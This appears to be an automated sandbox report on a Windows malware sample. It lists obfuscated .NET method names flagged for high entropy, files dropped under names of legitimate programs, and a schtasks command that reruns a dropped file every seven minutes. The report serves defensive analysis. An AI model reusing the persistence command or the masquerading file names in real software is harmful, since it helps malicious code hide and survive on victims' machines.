            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, clqeRmKQLeIC9Jm9RHc.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'ycB3xvBcJKPf9U7mDUp', 'lFh2iOByLYYZvEA4OGc', 'hnocyeBJYYkGbeA6fJ8', 'kIFLbEBl3u3fltvdfjQ', 'UYroQuBEFy6eoI88hau', 'yUHV3cBhs937QhGcY7S'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, URDysXKkQvWpEekJuWh.csHigh entropy of concatenated method names: 'V7j4X6oa8V', 'muJ46eUTju', 'QIJ4nSMi2P', 'dNxhrI9U37MlhD1jSir', 'hE03HJ9ByJr4AjsRqaI', 'gPJAlH92SnegbySUWXE', 'A7PDVn99yrqAK1im66S', 'NRMV4C9aLFKVdiM5b0d', 'STN6aw9Qp5PrZH5P2UZ', 'rnruls9X7kZVQLiFHUQ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, IDCHFBdjECaUwQM3nk.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'ayyBZfr4HRZUhksPtvv', 'ab152nrfPHpAkkZsP1Z', 'llIOOTrOntCBAn8kyfn', 'BAj9hyrLATqhUxOHysc', 'dairHYr0CqOPJGHRco3', 'RC2LaurScF4Jl2Er6p5'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, lQ37yCYRS2HVH15WW3P.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, FEHr0rYSexvntvbOspE.csHigh entropy of concatenated method names: '_7zt', 'FOj7VcvbjW', 'wdP7EK2P2I', 'n7G7uprOHg', 'oCZ73iUrl2', 'zYl7XMaMpi', 'W0i76SVb6O', 'q9EeB551QQF0NxJv2X0', 'P4IVJ45kntyuXhV2NZc', 'kyvUax50A0Y2JtTMcCd'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, KXhSNCRSe8ay4YDhAc.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'b0PKBEAvVs4LSasSTdj', 'gc9vZGAGPgmU6K0J9ts', 'ekjFbVAmmouI9YVNO4h', 'lu9TEQAKXZl074fddG9', 'fBoKWIAtfslWio8Gsl2', 'QZAGxMAsjn6Tsl2J6Z5'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, B7pJbEtsXIqvA7W3qsZ.csHigh entropy of concatenated method names: 'e3DQae2eRv', 'aGsE0AFgk8ynHvsnVZN', 'IjUcW4FCXfN82UL42TY', 'imlG51Fqm0VF4I1kkjS', 'iTkZDnFY1secT9neNqs', '_1fi', 'eWRyHeyCtr', '_676', 'IG9', 'mdP'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, rgjP704SynQRCAnbOTP.csHigh entropy of concatenated method names: 'nBTwzpMP89', 'vClYNNUl5q', 'WMhYKcNov1', 'lnJY4gBr4k', 'tTaYwGOGc4', 'ciaYYGd3Y5', 'zrDY9xZbK3', 'nYlYtC8NVa', 'rLjYLfs5U7', 'uy2Y2LTkBl'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, B5aUXjKVdm7BPw1qmFA.csHigh entropy of concatenated method names: 'GllKDMXd5I', 'ikEulmo4EuHIhT9t2FK', 'cML0yMofFoptT7IKmeG', 'YgHoE5ojqKZkqu5lwgc', 'klnX5PoNimM2j6dNyXV', 'fpPqEEoOHFH9YWRVZPp', 'E2UtW1oLa9tIfUajPds', 'PcTaYco0ZV5vZeyN8rZ', 'pZpbfYoSqv0lwbc5MqF', 'f28'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, LG3IJpYuVIQxccwaaSm.csHigh entropy of concatenated method names: 'nFj7JQTPII', 'hsB7ef1H3d', 'xL07A8ZvBQ', 'x3U7sOBgqF', 'gnK7aukGJu', 'IaRle95wVBUniKQgGG0', 'vKMBTA5cv80VNFyRiyy', 'qAeHC75IiLoK9S7rWkY', 'hbe4oO5HX61K8KE41AT', 'F6XAHH5yNpuOsFjoWNR'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, PPJE1r4NiTso8R7aj3I.csHigh entropy of concatenated method names: 'b0A4cQ4Qef', 'VRO4vy9OIx', 'jV74FdYK6U', 'GeU04G9ILshVPNJIbJI', 'RSyd3Y9HmHOGW3H7dgD', 'gM6Tbb9wTpK4qlMnSo2', 'zPHWuX9c3WsFpv52YHi', 'dTsBQE9ykiy0cJLSnr9', 'TX7urB9JX5n9LLhRwOn', 'LOyyyi9CyV7sxfoie8l'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, skEnq54XEtjv1vfhRTS.csHigh entropy of concatenated method names: 'UdEYuGeydE', 'vA8Y3PFMDT', 'dr0YXEtQvG', 'DMJY6TnJ0h', 'QxYYnIKwwN', 'zgXjMHjdbXYyFenpSNt', 'AqTDfdji00pDkEflGpF', 'fBZdQHTsc61nK1VAtci', 'sELHsQTz12ReNmbMBFZ', 'uxcTy0juA8MZqyJC7L7'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, q3YB7yK6myGtpvLAbmn.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'qWPgF1owvexK4B65s22', 'bVZrYJoc8ItV3NLNa1a', 'zutSQvoyxJy4x23qMtn', 'B4K3cgoJGFGTifqqepV', 'mFItleol92a6JUh98Yn', 'zutwPToEARdBlFxD4EH'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Eulfx5YZt7XKUGHm599.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'p3li8qq2ZD', 'bc1imyNbOv', 'r8j', 'LS1', '_55S'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, NoHkIALkTQaomdyHIF.csHigh entropy of concatenated method names: 'SkIqAkTQa', 'lX8p5gItQZaHDwqTUv', 'cbn4syCQLAhhymUJSk', 'CWwY127Hlrdiqf7IVS', 'WwI5pvHYAYxhi54WfN', 'G3fwlowvPji2XyEHSn', 'bl94qwZUg', 'AJkw2kXc4', 'QpOYwamUb', 'I0w9rGXwi'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, huKbJ1KokyavwR0hhUl.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'TCdivDU06qwH8KliN1J', 'OUF5kEUSyMuJrGE7IbL', 'NJH50tU120jrcxihpf5', 'veIyByUkGv0AHpDSVUL', 'UTXDPFUMuauijuf39Ne', 'G1lYgIUVQOsHwMheAwI'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YAj6ex9jXrGltQxbMXX.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Kq3c6ZKuCy', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, grqLMLtFcxLs483pUne.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, yR5TOuYlxDDZ8tlXV6w.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, jV7dYKKl6U3xuE2DQ1Y.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'DVXQmjbO4vsAn23POk8', 'sFMmxkbLMteUkC1xiHX', 'IA1AcSb0isdyrBJMsa0', 'BGQ3M2bSjow5KZ2RW1s', 'vgBmsSb1GdZLXtyMYqD', 'I4DHUbbkLFJJQwA4iWE'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, ejih03wB6xcYUYUs1sN.csHigh entropy of concatenated method names: 'sg9', 'rtIfK5R59d', 'olOGRwqOra', 'GxLf4nB59C', 'iVBthY1pn7HjU11hLuq', 'BeBgdb1nTbUlx4yNPJx', 'M5LVcO1D5F31DQWqawE', 'lC9ToY18p2X8PPBRAC9', 'Evxu3X1PSRKxgjb1rtW', 'irydOv1xMW45rb57LBi'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VeBxUrwVjT0KXvHo2cR.csHigh entropy of concatenated method names: 'GG9G8rnkBG', 'uIJGmpVIQx', 'xcwGgaaSm2', 'h2G8jWSFZbQK2X5gfTG', 'sOFkxiShnKhInS74dNJ', 'WjweQASeog0s75aVMJy', 'Dei0SGSR3nU8H8Qracf', 'wEJGtxheyI', 'nYLGLGpnjF', 'gCRG2BgT6C'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, MGdHOsySsH5376RNUj.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'sGaF62uUCeFhCOtctAj', 'vox1hVu9UGBH9ZcpEM4', 'zvm7eUuarRjweMFIJ69', 'kKNejvuQt12F8DMhuUD', 'qar21TuX3U3B52rHJxR', 'fF2VK8uTMaJ0Fu4C2Kk'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, KS9mERwza0WXlKRhU8e.csHigh entropy of concatenated method names: 'AJ7xyQ37yC', 'r2HxQVH15W', 'V3PxDyiFX9', 'bGT8dOMhvSyhiHIUAEy', 'wfTTG9MelEAr2TGBtCC', 'pA40RiMlQ0HEXhI3Xwt', 'feBYSLMELWWgrrNgSWg', 'XySM05MFSA3sumrcElM', 'JFMYUgMR2aKpuagJI4r', 'vTKDrOM8VCpAA7c2a4g'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, l17kOXwYIBwJirZfg92.csHigh entropy of concatenated method names: 'KSNLBmvOOZ', 'vrxLpYDjp5', 'C5NLdIUP3S', 'ArrLhEA2id', 's4lLCS5kBS', 'rSBLPU9qvP', 'nXBorCOYT14y46FBCZa', 'EiUsPKO3CsSCRCD0Utj', 'pHRnSPOqnEAaTD29tIm', 'qJll7OOgeaSGjVfMIZ7'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, lLKw7QYGvH9i55FOmbc.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, KIhmyy4EctCq2Of9aUn.csHigh entropy of concatenated method names: 'un8YqCPJE1', 'UiTYiso8R7', 'L2UjMBTMQ1v7hXbnZXa', 'VQiTSvTVbbyn3e47j1I', 'JStZ5VT1VfLsnCl4U6p', 'irFxbiTkmQ5q26knqoI', 'ivrlHST5x7h5DxR8BRg', 'uboKqMT3MjdXiew9eGb', 'NFo284Tqc6OK9YnZuQD', 'PD6NJATYVnxoqDEAPZ5'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, zX4Zwi41LTQ8CeoyUiI.csHigh entropy of concatenated method names: 'h4ot2mJFSl', 'imXtGdbk67', 'U59yxp4G5Rwo3Gcy8Go', 'aUo22K4mlkaOx6qieMk', 'Et2CdD46qSei4rIubAN', 'uhclQU4vvkDIO3ouKVl', 'Gs9tg9dqNH', 'bAlSZbfdHTFelRRkMcV', 'TRKRoYfiPe48qAwTN17', 'Q7CQeW4sapkhnC5uFRY'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, q2Rsc8KHuqg7EH1dMcS.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'gWY5q8U7KtMEFlCgKtW', 'oLD4C5UIiUHZgxAkmQP', 'xspmvDUHKC17De60lwT', 'lRuaMLUwMPFlpiDkKKV', 'XQYq4lUcZ2TpDmrQER0', 'sK3yTuUyDpjCKyrBj2E'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, w6xDbkt4ZptlmcTYrqj.csHigh entropy of concatenated method names: 'tY3v2bXirO', 'IabvGFDfAP', '_8r1', 'PO8vxXck92', 'vofvlj1Ar4', 'Y8Nvb4HxKL', 'D7Vv7m7EMh', 'MHXhxsEjxfDkEgXqPgK', 'pAUN57ENOBlpcYwSd8c', 'ywM6ojE4etuLTYgv0cm'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, o11V9eXEy449AMCVnE.csHigh entropy of concatenated method names: 'NHInCuVXp', 'R06cHpZAi', 'xhavfS9Qr', 'cgEFETYp3', 'X5nyxjWnh', 'n7fQlkMRA', 'Y0RD8PHwv', 'MfRaVeiokIUrlaHmn68', 'kaRrnNiBPApTbG7rfi5', 'sPLsaYi2qk2cpwekNUZ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, jv8psmYIhDyNIo457Gh.csHigh entropy of concatenated method names: 'F6q8cKv6OV', 'aJJ8FEDYln', 'xwC8qgK02L', 'YGE8iAPL9t', 'hWX88Z9sIR', 'YvO8mnX42w', 'zqY8gnwVjo', 'kRY8Mtty0s', 'J4M8SFtI13', 'UFE8VcRoln'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Ktcq3XC3us3rZiHClc.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'HBfVWLrFObjMI6aMbIy', 'JPq9XprRZybdCLbaEbp', 'Rf722vr8vaDvuUrd5eX', 'J9bOklrPHynl40kxkjS', 'Q7g0CMrpNvTZEGF4rok', 'velg67rnYkoIrTfGCNO'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cNlA0OY9RWDi04sJcf9.csHigh entropy of concatenated method names: 't0Lbgrg1qL', 'c8m4WAVfamSZRj8qZp8', 'Dis1lsVOA10SMf4BjY6', 'kytm9bVNE2Jn4kTtIj9', 'KUfYQSV4yHxpsHHcwRQ', 'WdixUvfCqZ', 'JcOx5Y8HjQ', 'v3JxfTQlbW', 'uYOxJSZqce', 'PkjxeXHF0a'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, TsUQfMt5e68VVXPeGW4.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'WwTFc7nJR5', 'AnUFvsmOgK', 'fsrFFPvB3N', 'vnOFyVfJIt', 'zmeFQHZue5', 'iJEFDoHhww', 'IInruMeyP4mnmeu5dDa'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, MVYlp5KLSXAwL5lXeat.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'oV6bwNZGp3WoPsnVMbu', 'njgAnkZm9aHck2n9aFy', 'puULu1ZKmZgpMV4LS39', 'mdRiFKZt3GYVXCwUuFk', 'g1w9NdZs8HHPKUeAqKu', 'y30p53ZzlyIwrJQbcN6'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, KjAvuPYnKUHFEydxbCy.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'j5PqNZxWmV', '_3il', 'zfOqKNBGEg', 'NcZq4XEN5k', '_78N', 'z3K'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, PEO5QqtcVo65KC4jOJr.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, O36uFnwiQHcdR1eMb0h.csHigh entropy of concatenated method names: 'tg32pXMjae', 'Enp2dBsjUe', 'T892hugTAP', 'lLK2Cw7QvH', 'hAyEYl0Hu0hlIZdvnEV', 'WVZCvG0wYSZUZ3c2Rwx', 'w0rRku0cgfuwh0m47GY', 'l8RmfP07L1aIfb6ADcD', 'oIbSkB0IqJFwyeisp2l', 'JIWqZq0y8bdWdXvWFUc'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, S3dnL0t68ZvBQn3UOBg.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DmIvngIcUH', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, kKemu04eA9NLP3CB4sG.csHigh entropy of concatenated method names: 'CbK9Demu0A', 'DTkSkfNtgvucvIFGEmi', 'pPQSv0NsFVn7tdoXuMJ', 'r5U2vqNmk8PS9PUV44N', 'sISghcNKrhkHqq349C5', 'MBPE72NzthEGD7ossCL', 'eIq0FQ4dEyYSeyyEXZ7', 'EP3Man4iZtEupvAkCbj', 'QrpCZx4u5MV9bLemxxQ', 'OdDUTH4W971YHSBJdI5'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, BCQvLxLlFdHPMXg3lqq.csHigh entropy of concatenated method names: 'iVNVUmww49LG0', 'JvYqKW8T5wW1fXVvLmB', 'NZpI5f8jpZV17bEgfAh', 'h4GEVx8NgVmbnd9Vr9f', 'sycAsf84uUaw1g9i3ys', 'oIJedq8fQwn18QdigTd', 'wRWVeI8Q5ETNydYWVNX', 'sqGxdX8XCjPoBjaGgRt', 'Y7HhuT8OxYs6OIYsChA', 'ly43ri8Lga1fYjW1G4y'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, n7F4pDLcQ7qsWQINwZv.csHigh entropy of concatenated method names: 'pKk5nEFpfY', 'Neq5cKK7TD', 'z7h5v1af8L', 'Xv35F8lXIl', 'tVS5ySwbVd', 'V0k5QWkDNj', 'UFg5Dn3IjP', 'h1i5UWUmJd', 'hCb55gWnWn', 'Byy5fdyeCj'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, a6ksCPwxZFgqlmNefeo.csHigh entropy of concatenated method names: 'lZg2J6F4iZ', 'IoF2eLmqNK', 'DMc2Ao4UmW', 'GU6HYo0XA0f0Eeqnixa', 'sWednG0ain2nZE8ch8e', 'WbvMAE0QZY4cP9OnNKJ', 'jgUasZ0TH12gG9FFKwS', 'kqG28QmK3D', 'PFZ2m87SMx', 'F932gtWNYP'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, TWd7Lh9wqkoH4hSZORi.csHigh entropy of concatenated method names: 'ltjGcFI1qXUSDkX0FqN', 'R8YMPpIkTMWbdR24Ng1', 'VfsfTII0ff7ZnlAj0pm', 'frO1jFISecwNfgxb1Ah', 'KPOEnnji8r', 'LSAguII5TqSVhML1veU', 'xSHd1wI3If2DNZ6Q33c', 'CHvuSjIM88NxGeMkL55', 'GluHjVIVWSJ0Z0FNtHn', 'jnEExlIqWmlLKG5PrPG'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, BX0uW8Kcx5ApPIFurXl.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'Vt3CNxoPhiAYnlxiax3', 'mhZu61opYAEmU2PPoU6', 'OP05VaonclsFonAmtMK', 'bexolmoD30kpAt4u9PG', 'a8DWx4oxrPaFkSloX8w', 'MEZ7T7o6nrhBG8DE0yt'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, vDPU3iKisC8tjZEBtDw.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'HS55j5bljoJ7JVA7yuQ', 'Eyq7ipbEsJWyyyYjC65', 'U0R0Pgbh2J18pHM9Bhy', 'qansAtbeJkEUBQdTXRM', 'WbwtxBbFtf8RkC8QL9E', 'Cy0ESIbRZBnETamEyxS'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, NRxTCNrvXrRtMQFAuv.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'hAtXW3AqFP80rltWfqU', 'HmJ3hMAY9ygBnE0ZJZe', 'ueWGfBAg7nxomjGHOAb', 's934q1AC7koNoSPHe3k', 'FYbk6gA7RVcTB4nGMgk', 'VFuvdjAIUjPjIyWunBI'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VfUIv8ttd6Da3kTL8fe.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, r24LZy4QHpidDFkCsQa.csHigh entropy of concatenated method names: 'iUmYRxHw4w', 'sCgYk1kFuG', 'b1IYzhmyyc', 'fCq9N2Of9a', 'DnL9KFChv6', 'mqp94F9sVr', 'Rxx9wkneO5', 'x1i9YW0mZ9', 'dl199cEkEn', 'yULGokjGSBwMrj6YlWB'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.csHigh entropy of concatenated method names: 'MjvwfYwQEN', 'h1wwJpAX93', 'c97weX0bjb', 'BygwAvQL0u', 'PtNwsZEMnw', 'caPwau7jBk', 'dVIw0KXHby', 'kT5ttdQMIZg1CnAkq5w', 'C6L5JhQ1YEAWGL1q4e9', 'FtNtwHQk4JuAMpYZ0RT'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, nVquJeKGUTjuoIJSMi2.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'gPdJFqbbtmKlQVpquOJ', 'if6XaGboWSWgXkWWU1U', 'RAV5f2bBNk50o2QWxYM', 'n2lJAZb24JxoFPsKW9q', 'woZfLebUPMg4W4cTkiS', 'r3NM8hb9h1prhLFXGf1'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, bWLN9HtQo8gJCamdInO.csHigh entropy of concatenated method names: 'aWmFGxvijM', 'XXGFxK9F61', 'EDxFlkdPJV', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'qAUFbEnEOv'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, o885w0J7A2DeBmtaR8.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'iv5pteUrp', 'FeJP5cuwxLo2vPjeSGF', 'UAvJtnucsVoDQLhITVW', 'TxDolJuydCXOdF51q4D', 'Uhy75AuJ3NgYPf2XjDZ', 'CruhuFullWjSXlOPx9L'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, DPWe6c4gopBQINfxuNt.csHigh entropy of concatenated method names: 'qcSwRgDUfm', 'sFYwkHfTXd', 'YRSDvKXOZSLvJbO74GX', 'fgkOGMXL3ZgmocImB7Q', 'GpndjoX0UFGMomkl1rR', 'E5t121XSdYeGkXWX2ET', 'p1sS1LX17Kl3OKO9bKD', 'A1pH79Xk4JofNIALAXh', 'QwraUqXMWadgs7vSJUr', 'ASqdsqXVoGfZPUEYcqZ'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, RI2EQCwCpI4OqtvJw5K.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'eM2fLxb5ST', 'YBXxYEYFYS', 'GvNf2KEWFh', 'DQoBx5kQYKJDNIGpcBV', 'BP2wWakXavLNxiEEUSE', 'DyhZdQkTsf39X6fnpQn', 'OdD15kkj0usKNMrvuil', 'oORaZUkNhFAa3xTheik'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, BCLMDCK9pYnN7RImZR5.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'RMpIPPZ8f81KZGn6jab', 'x8nmTcZPLhxbO4iOCuJ', 'TsLqPnZp3vAOe0K2rOw', 'FSn98bZnCSBfqE289E3', 'WntnW3ZDpcXCsxOa6yZ', 'TrGmFAZxdISA9IrtUeZ'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, Fes99d4kqNHuWuy35JH.csHigh entropy of concatenated method names: 'DdYLc4M0wn', 'HsAEZofDg2PL8od42Yl', 'TLw0Iffpwf0QN01g1Sg', 'fWrnOGfn8l8KgWxF1At', 'l2ru6HfxhNgQ4GH8hUG', 'YiyuVSf6V7EHWdYbCbe', 'KyLLSdPtfM', 'TcuLVLI5Nn', 'tG7LE87t45', 'nh9LunyDDj'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, Bdahlet35SmMKQpTI6c.csHigh entropy of concatenated method names: 'hJRvEejeSJ', 'REkvuIwQev', 'AOdv3ai3nB', 'sRsvXqnqtL', 'Apiv6CHJRK', 'MeiK9jEKo5HETsP3aeK', 'tCsXgLEtIbQqewAwVnF', 'ETmB0XEsNsCPtKf2bHN', 'H8w7uEEzn39Lj9xxtoK', 'w3H9A9hdHAn6OkBX6mk'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, wPgMPSK7l0mbpWBIkjG.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'dcfWc0b3BtqJRmkLtgG', 'hgx0QKbqnf7CInChfZY', 'iaoOHTbYurjQARCOIFL', 'xb1GGkbguADGLByB1OO', 'cicElfbC4f06Urjs5gO', 'JFFJgvb7c6q4vbEQCXe'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, wPyUXMKwN9c5m768D22.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'pKQZctZgqRPnG1AhN6L', 'ginDgSZC9vfYLSVFD7l', 'sXOb5sZ7KG9BdgjLFVU', 'NivjtGZIxbjKWA3cE8l', 'jRqeEeZHGT2ikvr8FJN', 'vBrxCGZwnlGs0VyV70a'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, lA7HlDIjawGO1vOx0L.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'sj89P7ARSRrROiRwXl2', 'TaBSOVA8vJWyEiTvaES', 'ArqmF6APY7HG6TOvtfh', 'bVsQ55ApTL4WdbJvJdF', 'SwUDNCAnjwMq1DUZVmS', 'xT521uADMYHXDZfTGIL'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, CIOsQFKFmvdpXx5bITV.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'xRKYYDosaauZqBTQpVD', 'YOygJGozv5dvX3WDhdO', 'zQs4yjBdjayWQ8WQuRF', 'DDM2ywBirWnnQxRFxKB', 'eTd9G9BuJ2fJBGwiAdG', 'w11w58BW6uriHl2VlLA'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, BDjb3CtZ6iRFa55VmSp.csHigh entropy of concatenated method names: 'nPDDX1GB06', '_1kO', '_9v4', '_294', 'cZrD6Rpf8S', 'euj', 'o5GDn6BSM0', 'IwiDcfb19Q', 'o87', 'j9dDvdDIw4'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, y4wiaGKId3Y5FrDxZbK.csHigh entropy of concatenated method names: 'XAm4VJpVYl', 'PMlM7Z9Z6I4AWsy892W', 'FhwlDw9beS6XTFUhEnE', 'l1P9cl9rXpnhS1N7M2J', 'qJgX2j9A9O93kx9sXtR', 'OjndBK9of3ttQsqfqRI', '_5q7', 'YZ8', '_6kf', 'G9C'

            Persistence and Installation Behavior

            Source: C:\bridgehyperperfdhcp\intoDhcp.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (33 identical entries)
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files\Windows Portable Devices\Idle.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Users\user\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe File created: C:\bridgehyperperfdhcp\intoDhcp.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files (x86)\Microsoft Office\dasHost.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe File created: C:\Program Files\Windows Portable Devices\upfc.exe

            Boot Survival

            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | File created: C:\Users\user\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
